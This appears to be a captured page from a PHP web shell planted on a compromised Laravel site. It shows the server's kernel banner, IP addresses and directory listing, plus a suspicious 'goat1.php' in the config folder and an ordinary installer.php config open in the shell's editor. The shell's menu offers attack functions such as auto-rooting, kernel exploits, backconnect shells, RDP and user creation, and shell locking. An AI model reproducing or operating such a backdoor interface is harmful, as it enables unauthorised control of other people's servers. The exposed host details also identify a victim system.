Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo19.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
app.php
7.19
KB
-rw-rw-r--
auth.php
3.81
KB
-rw-rw-r--
broadcasting.php
2.1
KB
-rw-rw-r--
cache.php
3.26
KB
-rw-rw-r--
database.php
5.17
KB
-rw-rw-r--
error_log
26.28
KB
-rw-r--r--
filesystems.php
2.31
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.59
KB
-rw-rw-r--
installer.php
4
KB
-rw-rw-r--
logging.php
4.08
KB
-rw-rw-r--
mail.php
3.95
KB
-rw-rw-r--
myfatoorah.php
539
B
-rw-rw-r--
queue.php
3.37
KB
-rw-rw-r--
sanctum.php
2.89
KB
-rw-rw-r--
services.php
979
B
-rw-rw-r--
session.php
7.32
KB
-rw-rw-r--
view.php
1.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : installer.php
<?php return [ /* |-------------------------------------------------------------------------- | Server Requirements |-------------------------------------------------------------------------- | | This is the default Laravel server requirements, you can add as many | as your application require, we check if the extension is enabled | by looping through the array and run "extension_loaded" on it. | */ 'core' => [ 'minPhpVersion' => '8.0.0', ], 'final' => [ 'key' => true, 'publish' => false, ], 'requirements' => [ 'php' => [ 'openssl', 'pdo', 'mbstring', 'tokenizer', 'JSON', 'cURL', ], 'class' => [ 'ZipArchive', ], 'apache' => [ 'mod_rewrite', ], ], /* |-------------------------------------------------------------------------- | Folders Permissions |-------------------------------------------------------------------------- | | This is the default Laravel folders permissions, if your application | requires more permissions just add them to the array list bellow. | */ 'permissions' => [ 'storage/' => '755', 'storage/framework/' => '755', 'storage/logs/' => '755', 'bootstrap/cache/' => '755', 'resources/lang' => '755', ], /* |-------------------------------------------------------------------------- | Environment Form Wizard Validation Rules & Messages |-------------------------------------------------------------------------- | | This are the default form field validation rules. Available Rules: | https://laravel.com/docs/5.4/validation#available-validation-rules | */ 'environment' => [ 'form' => [ 'rules' => [ 'app_name' => 'required|string|max:50', 'app_url' => 'required|url', 'database_connection' => 'required|string|max:50', 'database_hostname' => 'required|string|max:50', 'database_port' => 'required|numeric', 'database_name' => 'required|string|max:50', 'database_username' => 'required|string|max:50', 'database_password' => 'nullable|string|max:50', ], ], ], /* |-------------------------------------------------------------------------- | Installed Middleware Options |-------------------------------------------------------------------------- | Different available status switch configuration for the | canInstall middleware located in `canInstall.php`. | */ 'installed' => [ 'redirectOptions' => [ 'route' => [ 'name' => 'welcome', 'data' => [], ], 'abort' => [ 'type' => '404', ], 'dump' => [ 'data' => 'Dumping a not found message.', ], ], ], /* |-------------------------------------------------------------------------- | Selected Installed Middleware Option |-------------------------------------------------------------------------- | The selected option fo what happens when an installer instance has been | Default output is to `/resources/views/error/404.blade.php` if none. | The available middleware options include: | route, abort, dump, 404, default, '' | */ 'installedAlreadyAction' => '', /* |-------------------------------------------------------------------------- | Updater Enabled |-------------------------------------------------------------------------- | Can the application run the '/update' route with the migrations. | The default option is set to False if none is present. | Boolean value | */ 'updaterEnabled' => 'true', ];
Close